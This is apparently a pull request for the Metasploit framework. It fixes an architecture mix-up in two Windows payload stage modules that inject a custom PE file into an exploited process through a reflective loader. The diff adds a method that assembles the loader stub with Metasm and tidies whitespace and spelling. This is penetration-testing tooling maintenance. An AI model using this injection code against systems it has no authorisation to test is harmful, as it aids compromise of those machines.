### PR TITLE
Fix the Metasm architecture issue

### DIFF
--- a/modules/payloads/stages/windows/peinject.rb
+++ b/modules/payloads/stages/windows/peinject.rb
@@ -12,31 +12,44 @@ require 'msf/core/payload/windows/peinject'
 module MetasploitModule
   include Msf::Payload::Windows
   include Msf::Payload::Windows::PEInject
+  include Msf::Payload::Windows::ReflectivePELoader
+
   def initialize(info = {})
     super(
       update_info(
         info,
         'Name' => 'Windows Inject PE Files',
         'Description' => %q{
-          Inject a custom native PE file into the exploited process using a relective PE loader stub.
-          Reflective PE payload will be started in a new thread inside the target process.
+          Inject a custom native PE file into the exploited process using a reflective PE loader. Reflective PE payload
+          will be started in a new thread inside the target process. This module requires a PE file which contains
+          relocation data.
         },
         'Author' =>
-            [
-              'ege <egebalci[at]pm.me>'
-            ],
+          [
+            'ege <egebalci[at]pm.me>'
+          ],
         'License' => MSF_LICENSE,
         'Platform' => 'win',
         'Arch' => ARCH_X86,
         'References' =>
-            [
-              'https://github.com/EgeBalci/Amber'
-            ],
+          [
+            'https://github.com/EgeBalci/Amber'
+          ],
         'PayloadCompat' =>
-            {
-              'Convention' => 'sockedi handleedi -http -https'
-            }
+          {
+            'Convention' => 'sockedi handleedi -http -https'
+          }
       )
     )
+  end
+
+  def encapsulate_reflective_stub(mapped_pe)
+    call_size = mapped_pe.length + 5
+
+    reflective_loader = Metasm::Shellcode.assemble(Metasm::X86.new, "cld\ncall $+#{call_size}").encode_string
+    reflective_loader += mapped_pe
+    reflective_loader += Metasm::Shellcode.assemble(Metasm::X86.new, asm_reflective_pe_loader).encode_string
+
+    reflective_loader
   end
 end

--- a/modules/payloads/stages/windows/x64/peinject.rb
+++ b/modules/payloads/stages/windows/x64/peinject.rb
@@ -13,31 +13,44 @@ require 'msf/core/payload/windows/peinject'
 module MetasploitModule
   include Msf::Payload::Windows
   include Msf::Payload::Windows::PEInject
+  include Msf::Payload::Windows::ReflectivePELoader_x64
+
   def initialize(info = {})
     super(
       update_info(
         info,
         'Name' => 'Windows Inject Reflective PE Files',
         'Description' => %q{
-          Inject a custom native PE file into the exploited process using a relective PE loader.
-          Reflective PE payload will be started in a new thread inside the target process. This module requires a PE file witch contains relocation data.
+          Inject a custom native PE file into the exploited process using a reflective PE loader. Reflective PE payload
+          will be started in a new thread inside the target process. This module requires a PE file which contains
+          relocation data.
         },
         'Author' =>
-            [
-              'ege <egebalci[at]pm.me>'
-            ],
+          [
+            'ege <egebalci[at]pm.me>'
+          ],
         'References' =>
-            [
-              'https://github.com/EgeBalci/Amber'
-            ],
+          [
+            'https://github.com/EgeBalci/Amber'
+          ],
         'License' => MSF_LICENSE,
         'Platform' => 'win',
         'Arch' => ARCH_X64,
         'PayloadCompat' =>
-            {
-              'Convention' => 'sockrdi handlerdi -http -https'
-            }
+          {
+            'Convention' => 'sockrdi handlerdi -http -https'
+          }
       )
     )
+  end
+
+  def encapsulate_reflective_stub(mapped_pe)
+    call_size = mapped_pe.length + 5
+
+    reflective_loader = Metasm::Shellcode.assemble(Metasm::X64.new, "cld\ncall $+#{call_size}").encode_string
+    reflective_loader += mapped_pe
+    reflective_loader += Metasm::Shellcode.assemble(Metasm::X64.new, asm_reflective_pe_loader_x64).encode_string
+
+    reflective_loader
   end
 end


### PR DESCRIPTION
I fixed the Metasm issue, it was due to including both `include Msf::Payload::Windows::ReflectivePELoader_x64` and `include Msf::Payload::Windows::ReflectivePELoader` in the lib. These each by extension include the Block API which exposes `asm_block_api`. What was happening was the second (x64) was overwriting the first causing the x64 Block API stub to be used for both.

I also made a few white space changes, spelling fixes and used the constants for architecture checks.

If everything looks good to you, go ahead and merge this in which will update your PR for Metasploit and I can get started with testing.